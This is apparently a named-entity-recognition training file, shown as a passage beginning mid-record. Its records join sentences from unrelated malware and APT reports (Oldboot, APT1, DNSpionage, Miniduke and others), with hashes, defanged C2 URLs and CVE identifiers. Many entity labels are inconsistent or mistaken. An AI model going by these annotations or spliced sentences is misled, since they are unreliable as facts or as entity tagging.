US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies . In the ProCC campaigns , the downloaded files are Delphi binaries . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 50, "end": 61, "label": "System"}, {"start": 185, "end": 203, "label": "Organization"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 256, "end": 262, "label": "System"}, {"start": 274, "end": 285, "label": "Organization"}]} {"text": "They did this at least 5 times between 18 April and 15 May . LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 . The backdoor installed in the machine is more customized than that used by RevengeHotels : it \u2019s developed from scratch and is able to collect data from the clipboard and printer spooler , and capture screenshots . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 134, "end": 147, "label": "Organization"}, {"start": 192, "end": 200, "label": "Malware"}, {"start": 263, "end": 276, "label": "Organization"}]} {"text": "All the malicious Dvmap apps had the same functionality . Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits . Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites , it \u2019s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer . 
Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 18, "end": 23, "label": "Malware"}, {"start": 80, "end": 97, "label": "System"}, {"start": 132, "end": 148, "label": "System"}, {"start": 253, "end": 265, "label": "System"}, {"start": 375, "end": 386, "label": "Organization"}]} {"text": "They decrypt several archive files from the assets folder of the installation package , and launch an executable file from them with the name \u201c start. \u201d The interesting thing is that the Trojan supports even the 64-bit version of Android , which is very rare . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia . According to the relevant underground forums and messaging groups , these criminals also infect front desk machines in order to capture credentials from the hotel administration software ; they can then steal credit card details from it too . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": [{"start": 230, "end": 237, "label": "System"}]} {"text": "All encrypted archives can be divided into two groups : the first comprises Game321.res , Game322.res , Game323.res and Game642.res \u2013 and these are used in the initial phase of infection , while the second group : Game324.res and Game644.res , are used in the main phase . Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry . Some criminals also sell remote access to these systems , acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves . 
A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": [{"start": 76, "end": 87, "label": "Indicator"}, {"start": 90, "end": 101, "label": "Indicator"}, {"start": 104, "end": 115, "label": "Indicator"}, {"start": 120, "end": 131, "label": "Indicator"}, {"start": 214, "end": 225, "label": "Indicator"}, {"start": 230, "end": 241, "label": "Indicator"}, {"start": 412, "end": 418, "label": "Organization"}, {"start": 464, "end": 476, "label": "Organization"}, {"start": 652, "end": 666, "label": "Organization"}, {"start": 672, "end": 698, "label": "System"}, {"start": 717, "end": 742, "label": "System"}]} {"text": "Initial phase During this phase , the Trojan tries to gain root rights on the device and to install some modules . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Some Brazilian criminals tout credit card data extracted from a hotel \u2019s system as high quality and reliable because it was extracted from a trusted source , i.e. , a hotel administration system . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": [{"start": 392, "end": 411, "label": "Organization"}]} {"text": "All archives from this phase contain the same files except for one called \u201c common \u201d . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . The majority of the victims are associated with the hospitality sector . 
As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": [{"start": 87, "end": 94, "label": "Organization"}, {"start": 162, "end": 172, "label": "System"}]} {"text": "This is a local root exploit pack , and the Trojan uses 4 different exploit pack files , 3 for 32-bit systems and 1 for 64-bit-systems . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . Based on the routines used , we estimate that this attack has a global reach . The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": [{"start": 168, "end": 177, "label": "Organization"}, {"start": 201, "end": 220, "label": "Organization"}, {"start": 223, "end": 240, "label": "Organization"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 296, "end": 317, "label": "Organization"}]} {"text": "If these files successfully gain root rights , the Trojan will install several tools into the system . Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Based on data extracted from Bit.ly statistics , we can see that potential victims from many other countries have at least accessed the malicious link . 
On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": [{"start": 417, "end": 423, "label": "Indicator"}, {"start": 560, "end": 567, "label": "Organization"}, {"start": 598, "end": 626, "label": "Vulnerability"}]} {"text": "It will also install the malicious app \u201c com.qualcmm.timeservices. \u201d These archives contain the file \u201c .root.sh \u201d which has some comments in Chinese : Main phase In this phase , the Trojan launches the \u201c start \u201d file from Game324.res or Game644.res . FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops . This data suggests that the number of countries with potential victims is higher than our telemetry has registered . We called this new malware ?", "spans": [{"start": 41, "end": 66, "label": "Indicator"}, {"start": 103, "end": 111, "label": "Indicator"}, {"start": 222, "end": 233, "label": "Indicator"}, {"start": 237, "end": 248, "label": "Indicator"}, {"start": 251, "end": 261, "label": "System"}, {"start": 361, "end": 378, "label": "Organization"}, {"start": 591, "end": 598, "label": "Malware"}]} {"text": "It will check the version of Android installed and decide which library should be patched . This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . RevengeHotels is a campaign that has been active since at least 2015 , revealing different groups using traditional RAT malware to infect businesses in the hospitality sector . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? 
Divine Comedy .", "spans": [{"start": 29, "end": 36, "label": "System"}, {"start": 172, "end": 185, "label": "System"}, {"start": 249, "end": 262, "label": "Organization"}, {"start": 365, "end": 368, "label": "Malware"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 460, "end": 464, "label": "Malware"}, {"start": 538, "end": 553, "label": "Organization"}, {"start": 560, "end": 573, "label": "Organization"}]} {"text": "For Android 4.4.4 and older , the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so , and for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so . Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . While there is a marked interest in Brazilian victims , our telemetry shows that their reach has extended to other countries in Latin America and beyond . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": [{"start": 4, "end": 17, "label": "System"}, {"start": 100, "end": 109, "label": "Indicator"}, {"start": 120, "end": 127, "label": "System"}, {"start": 190, "end": 211, "label": "Indicator"}, {"start": 214, "end": 228, "label": "Organization"}, {"start": 622, "end": 678, "label": "Indicator"}, {"start": 681, "end": 696, "label": "Vulnerability"}]} {"text": "Both of these libraries are runtime libraries related to Dalvik and ART runtime environments . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The use of spear-phishing emails , malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign . 
Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": [{"start": 57, "end": 63, "label": "System"}, {"start": 68, "end": 71, "label": "System"}, {"start": 95, "end": 117, "label": "System"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 171, "end": 179, "label": "Organization"}, {"start": 182, "end": 191, "label": "Organization"}, {"start": 194, "end": 198, "label": "Organization"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 275, "end": 278, "label": "Malware"}, {"start": 407, "end": 417, "label": "Organization"}, {"start": 518, "end": 538, "label": "Organization"}]} {"text": "Before patching , the Trojan will backup the original library with a name bak_ { original name } . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . Other threat actors may also be part of this wave of attacks , though there is no confirmation at the current time . For the CrySyS Lab analysis , please read [ here ] .", "spans": [{"start": 131, "end": 141, "label": "System"}, {"start": 168, "end": 180, "label": "System"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 414, "end": 424, "label": "Organization"}]} {"text": "During patching , the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip . It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . 
If you want to be a savvy and safe traveler , it \u2019s highly recommended to use a virtual payment card for reservations made via OTAs , as these cards normally expire after one charge . The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": [{"start": 115, "end": 129, "label": "Indicator"}, {"start": 147, "end": 161, "label": "Organization"}, {"start": 411, "end": 436, "label": "Organization"}, {"start": 588, "end": 592, "label": "System"}, {"start": 649, "end": 667, "label": "Organization"}]} {"text": "This could be very dangerous and cause some devices to crash following the overwrite . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . While paying for your reservation or checking out at a hotel , it \u2019s a good idea to use a virtual wallet such as Apple Pay , Google Pay , etc . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": [{"start": 192, "end": 211, "label": "Organization"}, {"start": 220, "end": 241, "label": "Organization"}, {"start": 357, "end": 366, "label": "System"}, {"start": 369, "end": 379, "label": "System"}, {"start": 435, "end": 484, "label": "Organization"}]} {"text": "Then the Trojan will put the patched library back into the system directory . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product . RevengeHotels : 74440d5d0e6ae9b9a03d06dd61718f66 . 
The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": [{"start": 119, "end": 123, "label": "System"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 236, "end": 249, "label": "Organization"}, {"start": 252, "end": 284, "label": "Indicator"}]} {"text": "After that , the Trojan will replace the original /system/bin/ip with a malicious one from the archive ( Game324.res or Game644.res ) . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others . RevengeHotels : e675bdf6557350a02f15c14f386fcc47 . These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": [{"start": 50, "end": 64, "label": "Indicator"}, {"start": 105, "end": 116, "label": "Indicator"}, {"start": 120, "end": 131, "label": "Indicator"}, {"start": 136, "end": 140, "label": "System"}, {"start": 271, "end": 284, "label": "Organization"}, {"start": 287, "end": 319, "label": "Indicator"}, {"start": 328, "end": 347, "label": "Malware"}, {"start": 384, "end": 419, "label": "System"}]} {"text": "In doing so , the Trojan can be sure that its malicious module will be executed with system rights . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy . RevengeHotels : df632e25c32e8f8ad75ed3c50dd1cd47 . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": [{"start": 112, "end": 123, "label": "Organization"}, {"start": 197, "end": 204, "label": "System"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 255, "label": "Indicator"}]} {"text": "But the malicious ip file does not contain any methods from the original ip file . On Nov. 
27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage . RevengeHotels : a089efd7dd9180f9b726594bb6cf81ae . This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": [{"start": 103, "end": 117, "label": "Organization"}, {"start": 247, "end": 260, "label": "Organization"}, {"start": 263, "end": 295, "label": "Indicator"}, {"start": 298, "end": 390, "label": "Malware"}]} {"text": "This means that all apps that were using this file will lose some functionality or even start crashing . Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . RevengeHotels : 81701c891a1766c51c74bcfaf285854b . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": [{"start": 105, "end": 110, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 396, "end": 399, "label": "System"}, {"start": 478, "end": 491, "label": "Organization"}, {"start": 494, "end": 526, "label": "Indicator"}]} {"text": "Malicious module \u201c ip \u201d This file will be executed by the patched system library . Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . APT1 . 
If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": [{"start": 83, "end": 88, "label": "Organization"}, {"start": 356, "end": 360, "label": "Organization"}]} {"text": "It can turn off \u201c VerifyApps \u201d and enable the installation of apps from 3rd party stores by changing system settings . That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date . Since 2004 , Mandiant has investigated computer security breaches at hundreds of organizations around the world.The majority of these security breaches are attributed to advanced threat actors referred to as the \u201c Advanced Persistent Threat \u201d ( APT ) . These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": [{"start": 157, "end": 170, "label": "Organization"}, {"start": 171, "end": 182, "label": "Organization"}, {"start": 318, "end": 326, "label": "Organization"}]} {"text": "Furthermore , it can grant the \u201c com.qualcmm.timeservices \u201d app Device Administrator rights without any interaction with the user , just by running commands . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates . We first published details about the APT in our January 2010 M-Trends report . 
These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": [{"start": 33, "end": 57, "label": "Indicator"}, {"start": 385, "end": 394, "label": "Organization"}, {"start": 399, "end": 418, "label": "Organization"}, {"start": 617, "end": 625, "label": "Organization"}]} {"text": "It is a very unusual way to get Device Administrator rights . PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage . As we stated in there port , our position was that \u201c The Chinese government may authorize this activity , but there \u2019s no way to determine the extent of its involvement. \u201d Now , three years later , we have the evidence required to change our assessment . \u2022 Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar \u2013 if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": [{"start": 625, "end": 646, "label": "Organization"}, {"start": 718, "end": 725, "label": "Organization"}, {"start": 773, "end": 780, "label": "Malware"}, {"start": 789, "end": 795, "label": "Organization"}]} {"text": "Malicious app com.qualcmm.timeservices As I mentioned before , in the \u201c initial phase \u201d , the Trojan will install the \u201c com.qualcmm.timeservices \u201d app . This APT group usually carries out target attacks against government agencies to steal sensitive information . The details we have analyzed during hundreds of investigations convince us that the groups conducting these activities are based primarily in China and that the Chinese Government is aware of them . 
This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": [{"start": 14, "end": 38, "label": "Indicator"}, {"start": 120, "end": 144, "label": "Indicator"}, {"start": 211, "end": 230, "label": "Organization"}, {"start": 463, "end": 599, "label": "Malware"}]} {"text": "Its main purpose is to download archives and execute the \u201c start \u201d binary from them . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks . Mandiant continues to track dozens of APT groups around the world ; however , this report is focused on the most prolific of these groups . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": [{"start": 275, "end": 287, "label": "System"}, {"start": 312, "end": 320, "label": "Organization"}, {"start": 461, "end": 476, "label": "Organization"}, {"start": 489, "end": 491, "label": "System"}, {"start": 506, "end": 562, "label": "Indicator"}, {"start": 567, "end": 624, "label": "Indicator"}]} {"text": "During the investigation , this app was able to successfully connect to the command and control server , but it received no commands . We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware . We refer to this group as \u201c APT1 \u201d and it is one of more than 20 APT groups with origins inChina . 
Once they are downloaded to the machine , they can fetch a larger backdoor which carries out the cyberespionage activities , through functions such as copy file , move file , remove file , make directory , kill process and of course , download and execute new malware and lateral movement tools .", "spans": [{"start": 154, "end": 163, "label": "Organization"}, {"start": 284, "end": 299, "label": "System"}, {"start": 330, "end": 334, "label": "Organization"}, {"start": 494, "end": 523, "label": "Organization"}]} {"text": "So I don \u2019 t know what kind of files will be executed , but they could be malicious or advertising files . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities . APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006 . The final stage backdoor connects to two servers , one in Panama and one in Turkey to receive the instructions from the attackers .", "spans": [{"start": 172, "end": 179, "label": "System"}, {"start": 200, "end": 219, "label": "Organization"}, {"start": 222, "end": 226, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}]} {"text": "Conclusions This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques , including patching system libraries . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 . From our observations , it is one of the most prolific cyber espionage groups in terms of the sheer quantity of information stolen . 
The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : \u2022 By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": [{"start": 52, "end": 69, "label": "System"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 286, "end": 293, "label": "System"}, {"start": 495, "end": 504, "label": "Organization"}, {"start": 505, "end": 621, "label": "Indicator"}, {"start": 653, "end": 672, "label": "System"}, {"start": 675, "end": 725, "label": "Indicator"}]} {"text": "It installs malicious modules with different functionality into the system . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon . The scale and impact of APT1 \u2019s operations compelled us to write this report . Together with our partner CrySyS Lab , we \u2019ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": [{"start": 250, "end": 254, "label": "Organization"}, {"start": 331, "end": 341, "label": "Organization"}, {"start": 418, "end": 426, "label": "Malware"}]} {"text": "It looks like its main purpose is to get into the system and execute downloaded files with root rights . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen . The activity we have directly observed likely represents only a small fraction of the cyber espionage that APT1 has conducted . 
These new infection vectors rely on Java and IE vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 105, "end": 118, "label": "Organization"}, {"start": 139, "end": 153, "label": "System"}, {"start": 291, "end": 295, "label": "Organization"}, {"start": 348, "end": 375, "label": "Vulnerability"}, {"start": 386, "end": 402, "label": "Organization"}]} {"text": "But I never received such files from their command and control server . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) . Though our visibility of APT1 \u2019s activities is incomplete , we have analyzed the group \u2019s intrusions against nearly 150 victims over seven years . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": [{"start": 72, "end": 90, "label": "Organization"}, {"start": 174, "end": 185, "label": "Organization"}, {"start": 188, "end": 194, "label": "Organization"}, {"start": 202, "end": 217, "label": "System"}, {"start": 258, "end": 273, "label": "System"}, {"start": 303, "end": 307, "label": "Organization"}, {"start": 453, "end": 464, "label": "System"}, {"start": 468, "end": 476, "label": "Malware"}, {"start": 479, "end": 621, "label": "Indicator"}]} {"text": "These malicious modules report to the attackers about every step they are going to make . El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here . From our unique vantage point responding to victims , we tracked APT1 back to four large networks in Shanghai , two of which are allocated directly to the Pudong New Area . 
The page hxxp://[c2_hostname]/groups / business - principles.html is used as an starting point for the attack .", "spans": [{"start": 172, "end": 181, "label": "Organization"}, {"start": 254, "end": 258, "label": "Organization"}, {"start": 362, "end": 471, "label": "Indicator"}]} {"text": "So I think that the authors are still testing this malware , because they use some techniques which can break the infected devices . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 . We uncovered a substantial amount of APT1 \u2019s attack infrastructure , command and control , and modus operandi ( tools , tactics , and procedures ) . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": [{"start": 284, "end": 288, "label": "Organization"}, {"start": 396, "end": 484, "label": "Malware"}, {"start": 487, "end": 551, "label": "Indicator"}, {"start": 556, "end": 603, "label": "Malware"}, {"start": 606, "end": 648, "label": "Indicator"}]} {"text": "But they already have a lot of infected users on whom to test their methods . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . In an effort to underscore there are actual individuals behind the keyboard , Mandiant is revealing three personas we have attributed to APT1 . 
The second webpage , \u201c sidebar.html \u201d contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": [{"start": 352, "end": 360, "label": "Organization"}, {"start": 411, "end": 415, "label": "Organization"}, {"start": 441, "end": 473, "label": "Indicator"}, {"start": 476, "end": 538, "label": "Malware"}]} {"text": "I hope that by uncovering this malware at such an early stage , we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods . In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor . These operators , like soldiers , may merely be following orders given to them by others . Its code identifies the victim \u2019s browser and then serves one of two exploits .", "spans": [{"start": 198, "end": 205, "label": "System"}]} {"text": "MD5 43680D1914F28E14C90436E1D42984E2 20D4B9EB9377C499917C4D69BF4CCEBE First widely distributed Android bootkit Malware infects more than 350,000 Devices January 29 , 2014 In the last quarter of 2013 , sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China \u2019s cyber threat actors . 
It also sends collected browser data to another script by sending a POST request to \u201c hxxp://[c2_hostname]/groups / count / write.php \u201d .", "spans": [{"start": 4, "end": 36, "label": "Indicator"}, {"start": 37, "end": 69, "label": "Indicator"}, {"start": 95, "end": 102, "label": "System"}, {"start": 227, "end": 234, "label": "System"}, {"start": 303, "end": 308, "label": "System"}, {"start": 383, "end": 404, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 418, "end": 435, "label": "Organization"}, {"start": 438, "end": 456, "label": "Organization"}, {"start": 461, "end": 466, "label": "Organization"}, {"start": 471, "end": 480, "label": "Organization"}, {"start": 487, "end": 510, "label": "Organization"}, {"start": 554, "end": 558, "label": "Organization"}, {"start": 741, "end": 788, "label": "Indicator"}]} {"text": "A Russian security firm 'Doctor Web ' identified the first mass distributed Android bootkit malware called 'Android.Oldboot ' , a piece of malware that 's designed to re-infect devices after reboot , even if you delete all working components of it . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware . We believe that APT1 is able to wage such a long-running and extensive cyber espionage campaign in large part because it receives direct government support . The exploits are located in separate web pages .", "spans": [{"start": 32, "end": 35, "label": "Organization"}, {"start": 76, "end": 83, "label": "System"}, {"start": 268, "end": 281, "label": "Organization"}, {"start": 443, "end": 447, "label": "Organization"}]} {"text": "The bootkit Android.Oldboot has infected more than 350,000 android users in China , Spain , Italy , Germany , Russia , Brazil , the USA and some Southeast Asian countries . It was a targeted attack we are calling \" Machete \" . 
In seeking to identify the organization behind this activity ,our research found that People \u2019s Liberation Army ( PLA \u2019s ) Unit 61398 is similar to APT1 in its mission , capabilities , and resources . Clients using Internet Explorer version 8 are served with \u201c about.htm \u201d , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads \u201c JavaApplet.html \u201d .", "spans": [{"start": 12, "end": 27, "label": "Malware"}, {"start": 59, "end": 66, "label": "System"}, {"start": 313, "end": 338, "label": "Organization"}, {"start": 341, "end": 344, "label": "Organization"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 375, "end": 379, "label": "Organization"}, {"start": 442, "end": 469, "label": "System"}, {"start": 470, "end": 641, "label": "Indicator"}]} {"text": "China seems to a mass victim of this kind of malware having a 92 % share . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . PLA Unit 61398 is also located in precisely the same area from which APT1 activity appears to originate . 
The web page \u201c JavaApplet.html \u201d loads \u201c JavaApplet.class \u201d that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": [{"start": 111, "end": 135, "label": "System"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 235, "end": 238, "label": "Organization"}, {"start": 239, "end": 249, "label": "Organization"}, {"start": 304, "end": 308, "label": "Organization"}, {"start": 356, "end": 371, "label": "Indicator"}, {"start": 382, "end": 398, "label": "Indicator"}, {"start": 401, "end": 473, "label": "Malware"}, {"start": 474, "end": 489, "label": "Vulnerability"}]} {"text": "A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data , remove the application , open connection for Command and controller . \" Machete \" is a targeted attack campaign with Spanish speaking roots . APT1 is believed to be the 2nd Bureau of the People \u2019s Liberation Army ( PLA ) General Staff Department \u2019s ( GSD ) 3rd Department , which is most commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 . 
The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": [{"start": 255, "end": 259, "label": "Organization"}, {"start": 286, "end": 325, "label": "Organization"}, {"start": 328, "end": 331, "label": "Organization"}, {"start": 334, "end": 358, "label": "Organization"}, {"start": 364, "end": 367, "label": "Organization"}, {"start": 423, "end": 453, "label": "Organization"}, {"start": 456, "end": 460, "label": "Organization"}, {"start": 466, "end": 476, "label": "Organization"}, {"start": 479, "end": 561, "label": "Malware"}, {"start": 568, "end": 674, "label": "Malware"}]} {"text": "A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init ' script ( initialize the operating system ) to re-load the malware as you switch on your android . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks . The nature of \u201c Unit 61398 \u2019s \u201d work is considered by China to be a state secret ; however , we believe it engages in harmful \u201c Computer Network Operations. \u201d Unit 61398 is partially situated on Datong Road in Gaoqiaozhen , which is located in the Pudong New Area of Shanghai . 
According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": [{"start": 68, "end": 75, "label": "System"}, {"start": 280, "end": 287, "label": "System"}, {"start": 294, "end": 310, "label": "System"}, {"start": 503, "end": 513, "label": "Organization"}, {"start": 646, "end": 656, "label": "Organization"}, {"start": 778, "end": 804, "label": "System"}, {"start": 925, "end": 931, "label": "Organization"}, {"start": 970, "end": 983, "label": "Vulnerability"}]} {"text": "When you start your device , this script loads the Trojan 'imei_chk ' ( detects it as Android.Oldboot.1 ) which extract two files libgooglekernel.so ( Android.Oldboot.2 ) and GoogleKernel.apk ( Android.Oldboot.1.origin ) , copy them respectively in /system/lib and /system/app . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list . The central building in this compound is a 130,663 square foot facility that is 12 stories high and was built in early 2007 . It decodes the binary and writes it to a Java temporary directory with name \u201c ntuser.bin \u201d .", "spans": [{"start": 86, "end": 103, "label": "Indicator"}, {"start": 130, "end": 148, "label": "Indicator"}, {"start": 151, "end": 168, "label": "Indicator"}, {"start": 175, "end": 191, "label": "Indicator"}, {"start": 194, "end": 218, "label": "Indicator"}, {"start": 249, "end": 276, "label": "Indicator"}, {"start": 340, "end": 347, "label": "Organization"}]} {"text": "Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download , remove installed apps , and install malicious apps . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code . 
